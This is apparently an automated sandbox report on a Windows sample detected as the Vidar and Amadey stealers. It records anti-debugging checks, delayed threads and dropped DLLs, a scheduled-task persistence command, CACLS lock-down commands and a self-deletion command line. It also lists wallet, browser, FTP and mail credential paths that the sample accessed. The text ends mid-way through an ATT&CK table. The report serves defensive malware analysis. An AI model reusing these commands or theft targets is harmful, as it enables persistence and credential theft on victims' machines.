                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-5510
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\cred64[1].dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeThread delayed: delay time: 180000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeThread delayed: delay time: 360000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeThread delayed: delay time: 180000Jump to behavior
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeRegistry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeThread delayed: delay time: 30000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeThread delayed: delay time: 50000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeThread delayed: delay time: 180000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeThread delayed: delay time: 360000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeThread delayed: delay time: 180000Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeThread delayed: delay time: 30000Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeSystem information queried: ModuleInformationJump to behavior
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\Jump to behavior
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\Jump to behavior
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\Jump to behavior
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\Jump to behavior
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\Jump to behavior
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\Jump to behavior
                      Source: 5GPueTFF2S.exe, 00000000.00000003.420692753.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5GPueTFF2S.exe, 00000000.00000002.423403008.0000000000A31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW_^
                      Source: 5GPueTFF2S.exe, 00000000.00000002.429571864.0000000008DD0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
                      Source: 5GPueTFF2S.exe, 00000000.00000003.420608823.00000000009F7000.00000004.00000020.00020000.00000000.sdmp, 5GPueTFF2S.exe, 00000000.00000003.420692753.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5GPueTFF2S.exe, 00000000.00000002.423133875.00000000009F7000.00000004.00000020.00020000.00000000.sdmp, 5GPueTFF2S.exe, 00000000.00000002.423403008.0000000000A31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW

                      Anti Debugging

                      barindex
                      Hides threads from debuggers
                      Source: C:\ProgramData\75873290272674793137.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\ProgramData\75873290272674793137.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeCode function: 0_2_00ECA6E1 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00ECA6E1
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeCode function: 0_2_00EC35E0 _memset,GetProcAddress,KiUserExceptionDispatcher,CoInitialize,GetThreadUILanguage,TlsGetValue,GetSystemDefaultLangID,IsZoomed,FoldStringW,CoUninitialize,CoUninitialize,GetProcAddress,GetProcAddress,Sleep,OutputDebugStringW,SetLastError,GetLastError,GetLastError,SetLastError,GetConsoleCP,GetLastError,HeapCreate,GetProcAddress,Sleep,RtlAllocateHeap,0_2_00EC35E0
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeCode function: 0_2_00ECBAFC LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_00ECBAFC
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeProcess queried: DebugPortJump to behavior
                      Source: C:\ProgramData\75873290272674793137.exeProcess queried: DebugPortJump to behavior
                      Source: C:\ProgramData\75873290272674793137.exeProcess queried: DebugObjectHandleJump to behavior
                      Source: C:\ProgramData\75873290272674793137.exeProcess queried: DebugObjectHandleJump to behavior
                      Source: C:\ProgramData\75873290272674793137.exeProcess queried: DebugObjectHandleJump to behavior
                      Source: C:\ProgramData\75873290272674793137.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeProcess queried: DebugObjectHandleJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeProcess queried: DebugObjectHandleJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeProcess queried: DebugObjectHandleJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeProcess queried: DebugObjectHandleJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeProcess queried: DebugObjectHandleJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeProcess queried: DebugObjectHandleJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugObjectHandleJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugObjectHandleJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugObjectHandleJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeCode function: 0_2_00ECA6E1 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00ECA6E1
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeCode function: 0_2_00ECCEC4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00ECCEC4
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeCode function: 0_2_00EC91DC SetUnhandledExceptionFilter,0_2_00EC91DC
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeCode function: 0_2_00ECD545 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00ECD545

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      System process connects to network (likely due to code injection or exploit)
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 192.168.2.4 80Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 85.209.135.109 80Jump to behavior
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeProcess created: C:\ProgramData\75873290272674793137.exe "C:\ProgramData\75873290272674793137.exe" Jump to behavior
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\5GPueTFF2S.exe" & exitJump to behavior
                      Source: C:\ProgramData\75873290272674793137.exeProcess created: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe "C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe" Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 6 Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe" /FJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "gntuud.exe" /P "user:N"&&CACLS "gntuud.exe" /P "user:R" /E&&echo Y|CACLS "..\03bd543fce" /P "user:N"&&CACLS "..\03bd543fce" /P "user:R" /E&&ExitJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\c33e9ad058e5d3\cred64.dll, MainJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:N"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "gntuud.exe" /P "user:R" /EJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\03bd543fce" /P "user:N"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\03bd543fce" /P "user:R" /EJump to behavior
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeQueries volume information: C:\Users\user\AppData\Roaming\c33e9ad058e5d3\cred64.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeQueries volume information: C:\Users\user\AppData\Roaming\c33e9ad058e5d3\cred64.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeCode function: GetLocaleInfoA,0_2_00ECE8AA
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeCode function: 0_2_00ECA63C GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00ECA63C

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Amadeys stealer DLL
                      Source: Yara matchFile source: 18.2.gntuud.exe.a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.75873290272674793137.exe.f70000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000012.00000002.518241260.00000000000A1000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.445175041.0000000000F71000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY
                      Yara detected Amadey bot
                      Source: Yara matchFile source: 00000007.00000003.483002099.0000000001165000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Yara detected Vidar stealer
                      Source: Yara matchFile source: 0.2.5GPueTFF2S.exe.a3f900.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.5GPueTFF2S.exe.b070000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.5GPueTFF2S.exe.a3f900.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.5GPueTFF2S.exe.b070000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.5GPueTFF2S.exe.b070000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.5GPueTFF2S.exe.a3f900.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.5GPueTFF2S.exe.a3f900.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000003.420692753.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.432090196.000000000B0A5000.00000002.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.423403008.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.387953405.000000000B070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 5GPueTFF2S.exe PID: 5848, type: MEMORYSTR
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                      Tries to steal Crypto Currency Wallets
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\????Jump to behavior
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\????Jump to behavior
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\????Jump to behavior
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\????Jump to behavior
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\????Jump to behavior
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\????Jump to behavior
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\????Jump to behavior
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\????Jump to behavior
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\????Jump to behavior
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\????Jump to behavior
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\Jump to behavior
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\ConfigurationJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xmlJump to behavior
                      Found many strings related to Crypto-Wallets (likely being stolen)
                      Source: 5GPueTFF2S.exe, 00000000.00000003.420692753.0000000000A31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets\
                      Source: 5GPueTFF2S.exe, 00000000.00000003.420692753.0000000000A31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \ElectronCash\wallets\
                      Source: 5GPueTFF2S.exe, 00000000.00000003.420692753.0000000000A31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Electrum\wallets\
                      Source: 5GPueTFF2S.exe, 00000000.00000003.420608823.00000000009F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
                      Source: 5GPueTFF2S.exe, 00000000.00000003.420692753.0000000000A31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                      Source: 5GPueTFF2S.exe, 00000000.00000003.420692753.0000000000A31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: exodus.conf.json
                      Source: 5GPueTFF2S.exe, 00000000.00000003.420692753.0000000000A31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                      Source: 5GPueTFF2S.exe, 00000000.00000003.420692753.0000000000A31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: info.seco
                      Source: 5GPueTFF2S.exe, 00000000.00000003.420692753.0000000000A31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC
                      Source: 5GPueTFF2S.exe, 00000000.00000003.420692753.0000000000A31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \jaxx\Local Storage\
                      Source: 5GPueTFF2S.exe, 00000000.00000003.420692753.0000000000A31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: passphrase.json
                      Source: 5GPueTFF2S.exe, 00000000.00000003.420692753.0000000000A31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Ethereum\
                      Source: 5GPueTFF2S.exe, 00000000.00000003.420692753.0000000000A31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: exodus.conf.json
                      Source: 5GPueTFF2S.exe, 00000000.00000003.420692753.0000000000A31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: file__0.localstorage
                      Source: 5GPueTFF2S.exe, 00000000.00000003.420692753.0000000000A31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default_wallet
                      Source: 5GPueTFF2S.exe, 00000000.00000003.420692753.0000000000A31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Ethereum"
                      Source: 5GPueTFF2S.exe, 00000000.00000003.420692753.0000000000A31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                      Source: 5GPueTFF2S.exe, 00000000.00000003.420692753.0000000000A31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: multidoge.wallet
                      Source: 5GPueTFF2S.exe, 00000000.00000003.420692753.0000000000A31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: seed.seco
                      Source: 5GPueTFF2S.exe, 00000000.00000003.420692753.0000000000A31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                      Source: 5GPueTFF2S.exe, 00000000.00000003.420692753.0000000000A31000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Electrum-LTC\wallets\
                      Tries to steal Instant Messenger accounts or passwords
                      Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\5GPueTFF2S.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: Yara matchFile source: 0.2.5GPueTFF2S.exe.a3f900.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.5GPueTFF2S.exe.a3f900.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000003.420692753.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.423403008.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 5GPueTFF2S.exe PID: 5848, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected Vidar stealer
                      Source: Yara matchFile source: 0.2.5GPueTFF2S.exe.a3f900.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.5GPueTFF2S.exe.b070000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.5GPueTFF2S.exe.a3f900.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.5GPueTFF2S.exe.b070000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.5GPueTFF2S.exe.b070000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.5GPueTFF2S.exe.a3f900.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.5GPueTFF2S.exe.a3f900.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000003.420692753.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.432090196.000000000B0A5000.00000002.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.423403008.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.387953405.000000000B070000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 5GPueTFF2S.exe PID: 5848, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts2
                      Native API                      		1
                      Scheduled Task/Job                      		111
                      Process Injection                      		2
